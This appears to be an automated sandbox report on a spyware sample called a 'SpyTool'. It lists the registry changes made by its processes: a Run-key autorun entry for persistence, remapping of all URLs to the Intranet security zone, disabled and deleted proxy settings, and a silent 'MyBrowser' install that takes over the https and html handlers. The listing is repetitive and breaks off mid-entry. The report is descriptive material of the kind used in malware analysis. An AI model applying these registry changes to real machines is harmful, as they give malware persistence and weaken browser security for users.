[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsk3C.tmp:192 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 0F 66 A5 C1 94 7A 5E AD B3 71 DF ED B5 9C C0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-6JM0V.tmp]
"nsx27.tmp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-8964"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9217"
"SHELL32.dll,-9319"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nsk3C.tmp"
"nsb2E.tmp"

The process gmsd_re_005010096.exe:740 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF EC C4 AC 7E 75 7B F9 15 72 B5 EE AB 35 70 62"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process nsk15.tmp:1340 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 9C 87 EC 01 7C 2B B2 E2 DF F3 52 32 E5 DE C9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsj35.tmp:588 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "som"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 C4 1D 07 D2 6D 30 14 9E 08 98 FA 9E 9F 7D 3E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsb2E.tmp:908 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 71 53 44 42 47 8B E0 F9 A0 B4 04 1D C0 FD 4E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 8819.exe:368 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\CrossBrowser]
"Installation" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 98 73 21 25 40 56 E2 C1 7A F9 C5 99 89 41 92"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\5517]
"setup.exe" = "MyBrowser Installer"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nssF.tmp:1488 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 52 4F D1 21 92 E2 C5 0E FC 52 D5 9E B8 52 00"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

The process setup.exe:828 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"

[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"

[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
